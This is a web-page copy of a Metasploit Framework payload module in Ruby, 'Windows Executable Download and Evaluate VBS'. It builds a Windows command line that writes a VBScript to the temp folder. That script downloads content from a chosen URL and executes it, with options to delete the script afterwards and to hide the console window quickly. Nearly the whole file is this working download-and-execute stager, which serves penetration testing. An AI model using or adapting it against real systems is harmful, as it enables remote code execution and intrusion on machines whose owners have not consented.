Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/cmd/windows/download_eval_vbs.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = :dynamic

8


9
  include Msf::Payload::Single

10
  include Msf::Sessions::CommandShellOptions

11


12
  def initialize(info = {})

13
    super(

14
      merge_info(

15
        info,

16
        'Name' => 'Windows Executable Download and Evaluate VBS',

17
        'Description' => %q{

18
          Downloads a file from an HTTP(S) URL and executes it as a vbs script.

19
          Use it to stage a vbs encoded payload from a short command line.

20
        },

21
        'Author' => 'scriptjunkie',

22
        'License' => BSD_LICENSE,

23
        'Platform' => 'win',

24
        'Arch' => ARCH_CMD,

25
        'Handler' => Msf::Handler::None,

26
        'Session' => Msf::Sessions::CommandShell,

27
        'PayloadType' => 'cmd',

28
        'RequiredCmd' => 'wscript',

29
        'Payload' => {

30
          'Offsets' => {},

31
          'Payload' => ''

32
        }

33
      )

34
    )

35


36
    register_options(

37
      [

38
        OptString.new('URL', [ true, 'The pre-encoded URL to the script' ]),

39
        OptBool.new('INCLUDECMD', [ true, 'Include the cmd /q /c', false ]),

40
        OptBool.new('INCLUDEWSCRIPT', [ true, 'Include the wscript command', false ]),

41
        OptBool.new('DELETE', [ true, 'Delete created .vbs after download', false ])

42
      ]

43
    )

44
  end

45


46
  def generate(_opts = {})

47
    return super + command_string

48
  end

49


50
  def command_string

51
    # Keep variable names short.

52
    vbsname = Rex::Text.rand_text_alpha(1..2)

53
    xmlhttpvar = Rex::Text.rand_text_alpha(1..2)

54


55
    command = ''

56
    command << 'cmd.exe /q /c ' if datastore['INCLUDECMD']

57
    command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):" \

58
               "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:" \

59
               "#{xmlhttpvar}.Send:" \

60
               "Execute #{xmlhttpvar}.responseText"

61
    command << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']

62


63
    # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window

64
    # disappears quickly before the wscript libraries load and the file downloads

65
    command << " >#{vbsname}.vbs" \

66
               '&start '

67
    command << 'wscript ' if datastore['INCLUDEWSCRIPT']

68
    command << "#{vbsname}.vbs"

69
  end

70
end

71


72